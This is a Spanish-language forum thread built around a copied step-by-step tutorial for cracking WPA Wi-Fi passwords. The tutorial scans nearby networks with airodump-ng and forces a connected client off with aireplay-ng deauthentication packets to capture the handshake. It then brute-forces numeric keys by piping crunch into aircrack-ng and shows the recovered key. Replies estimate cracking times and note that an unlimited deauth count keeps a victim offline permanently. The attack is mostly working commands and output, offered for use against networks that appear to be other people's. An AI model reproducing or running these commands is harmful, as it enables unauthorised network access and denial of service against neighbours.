Les dejo el nombre del programa y el programa


[Enlace externo eliminado para invitados]


el nombre de este es CRUNCH con al cual tienen un 75% de probabilidades de sacar una de estas claves ,,,era privado hasta hace poco segun entiendo., pero lo liberaron descaradamente... wpa2 ahora es mas sencillo a ver si pongo el tutorial aunque ay varios dando vueltas por alli
no se permiten firmas de este tipo. la próxima no va a ser una advertencia sino un ban.
[Enlace externo eliminado para invitados]

ahora ay mucha info solo es cosa de leer por eso les paso el dato

tar -xvzf crunch*.tgz

Entramos al directorio

cd crunch

Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen:

apt-get install build-essential

Ahora si, lo compilamos:

make

make install

Por último copiamos el comando al sbin:

cp crunch /usr/sbin/

Voy a dar por sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-get por las dudas:

apt-get install aircrack-ng

Empezamos !!

Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya):

airodump-ng ath1

Me aparecen un par de redes:

CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:11:D3:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w
00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin
00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys
00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w
00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default
00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED
00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN 00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J
00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA
00:21:29:72:FC:32 5 3 0 0 11 54 . WEP WEP linksys
00:0F:A3:F1:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA
00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS
00:0F:A3:F1:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn
1C:AF:F7:42:E1:E6 -1 0 0 0 9 -1 00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP 00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc
00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt
00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769

Juro que el ESSID PORINGA no es mío !!

Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK:

TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)

Una vez que tenemos el MAC del AP y el canal, ponemos:

airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1

En este caso:

airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1

Ahora airodump sólo va a escuchar ese canal y ese AP.:

CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau

BSSID STATION PWR Rate Lost Packets Probes

00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 – 1 42 1102
00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 – 1 0 61 default

Acá tenemos dos posibles escenarios:

1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2) Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake

En este caso vamos a utilizar la segunda opción, anotamos el MAC del AP y el MAC del cliente conectado.

AP: 00:18:E7:56:26:89
Cliente Conectado: 00:0C:41:7A:77:43

Procedemos a desautenticar al cliente mediante este comando:

aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1

En este caso:

aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1

Hace algo así:

[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [38|186 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs]
23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs]
23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]

Si no lo desautentifica a la primera, volver a repetir el comando.

Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake

CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89

Listo, ya tenemos nuestro handshake, ahora utilizamos el crunch:

Escribimos esto:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

En este caso:

crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -

Aclaración: "crunch 8 9" hace referencia a que las claves WPA como mínimo tienen 8 caracteres, en este caso yo quiero que sólo pruebe hasta 9 caracteres, y que utilice los números 0123456789.
El 75% de los usuarios cometen el error de "securizar" la red con WPA y usar claves numéricas, que en este caso vamos a ver lo fáciles que son de conseguir con crunch
Si quisiéramos que crunch use letras, pondríamos "crunch 8 15 (máximo 15 caracteres)" abcdefghijklmno"

Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:

[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -
Opening /home/dke/default-01.cap
Reading packets, please wait…

Aircrack-ng 1.0 rc3

[00:00:50] 72172 keys tested (1445.33 k/s)

KEY FOUND! [ 00072169 ]

Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D

Listo, ya tenemos la clave :)



fuente : dysloke.com
no se permiten firmas de este tipo. la próxima no va a ser una advertencia sino un ban.
con una clave de 13 caracteres(letras y numeros) como seria de efectivo?
Sudafrica 2010
################################
################################
################################
################################
selanabar tu que dices una clave del tipo xxxxxxxxxxxxx
donde cada "x" puede ser desde el 0-9 y a-z ??

si es asi sería 13^37 posibilidades diferentes .......
aqui cuento a la ñ, pero no las mayusculas ni caracteres tipo !"·$%&/()=?¿^*Ç y demas

no tengo ni idea de cuanto es capaz aircrack de probrar las contras contra una wpa pero pongams que son 100.000 por minuto (qe me parece muchisimo pero bueno...)
pues entonces tenemos que 13^37 /100.000 = 1.644 *10^36 minutos, que aproximadamente son 3.13*10^30 añitos.....
puaff vamos lo que seria dejar el pc 2 dias conectao y facil vamos..... xDD
En 1º en 2º o en 3º BETICO hasta que muera
davidad, yo con crunch y aircrack en un vps de 5gb de ram y un intel i7 comprobaba 2000 pass por segundo. WPA como mínimo tiene 8 caracteres... a la velocidad que he dicho anteriormente y teniendo que probar hasta llegar a 99999999 (solo números) creo que tardó un poco más de 24h en probarlas todas... ya me desmotivé y no probé con letras, aun teniendo un vps pontente, se hace eterno :S

PD: este método no era privado, yo lo conozco desde hace muchísimo tiempo, pensaba que era otro método el que decías H4D3S_ :S

un saludo!
Soy un camaleón, en tu cama, leona ♪
Dr. tu lo has dicho solo numeros, los calculos que yo le he hecho es para letras y numeros y las combinaciones son eternas....
creo que wpa por fuerza bruta es una matanza y por diccionario es otra......
yo le veo futuro en las que estan predeterminadas
En 1º en 2º o en 3º BETICO hasta que muera
el 10 significa el nuevo de veces a realizar la accion que en este caso es el ataque 0 deauth... Si pones 0 sera un DDOS eterno y jamas se conectaran xD
1337 & culture!
Tomaría mucho tiempo con las maquinas actuales para pode encontrar claves con letras y números extensas, tocará montar un cluster jejeje gracias por la info
Responder

Volver a “Seguridad Wireless”